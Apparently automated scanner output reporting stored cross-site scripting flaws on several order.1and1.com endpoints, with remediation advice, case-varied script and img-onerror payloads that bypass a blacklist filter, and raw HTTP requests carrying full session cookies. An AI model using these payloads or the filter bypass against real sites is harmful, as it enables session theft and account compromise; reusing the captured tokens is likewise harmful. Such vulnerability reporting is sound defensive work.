Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.
The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.
Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).
Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach targe users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.
Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 3 submitted to the URL /xml/order/CloudDynamicServer is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/CloudDynamicServer. The payload be5ae</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 was submitted in the REST URL parameter 3. This input was returned as be5ae</ScRiPt ><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 in a subsequent request for the URL /xml/order/CloudDynamicServer.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of REST URL parameter 3 submitted to the URL /xml/order/DomaininfoMove is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/DomaininfoMove. The payload d1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 was submitted in the REST URL parameter 3. This input was returned as d1dbe</ScRiPt ><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 in a subsequent request for the URL /xml/order/DomaininfoMove.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/DomaininfoMoved1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/Eshops is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Eshops. The payload f145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5 was submitted in the REST URL parameter 3. This input was returned as f145e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>222daa67bf5 in a subsequent request for the URL /xml/order/Eshops.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/Eshopsf145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureDatabaseDatabase is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureDatabaseDatabase. The payload 9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0 was submitted in the REST URL parameter 3. This input was returned as 9ead5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>428693372d0 in a subsequent request for the URL /xml/order/FeatureDatabaseDatabase.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureDatabaseDatabase9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureDatabaseDatabase;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailEmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailEmail. The payload f6a45</ScRiPt%20>ca9d9974f55 was submitted in the REST URL parameter 3. This input was returned as f6a45</ScRiPt >ca9d9974f55 in a subsequent request for the URL /xml/order/FeatureEmailEmail.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureEmailEmailf6a45</ScRiPt%20>ca9d9974f55;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureEmailEmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailWebmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailWebmail. The payload 45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 was submitted in the REST URL parameter 3. This input was returned as 45663</ScRiPt ><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 in a subsequent request for the URL /xml/order/FeatureEmailWebmail.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureEmailWebmail45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureEmailWebmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureGuaranteeMoneyback is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureGuaranteeMoneyback. The payload 83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d was submitted in the REST URL parameter 3. This input was returned as 83c9e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>eed4e62047d in a subsequent request for the URL /xml/order/FeatureGuaranteeMoneyback.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureGuaranteeMoneyback83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureGuaranteeMoneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureMarketingCtrCitysearch is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureMarketingCtrCitysearch. The payload 649d3</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>b5a1ad5a333 was submitted in the REST URL parameter 3. This input was returned as 649d3</ScRiPt ><img src=a onerror=alert(1)>b5a1ad5a333 in a subsequent request for the URL /xml/order/FeatureMarketingCtrCitysearch.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureMarketingCtrCitysearch649d3</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>b5a1ad5a333;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureMarketingCtrCitysearch;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureMarketingCtrStat is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureMarketingCtrStat. The payload ccb50</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>3147a128d82 was submitted in the REST URL parameter 3. This input was returned as ccb50</ScRiPt ><img src=a onerror=alert(1)>3147a128d82 in a subsequent request for the URL /xml/order/FeatureMarketingCtrStat.
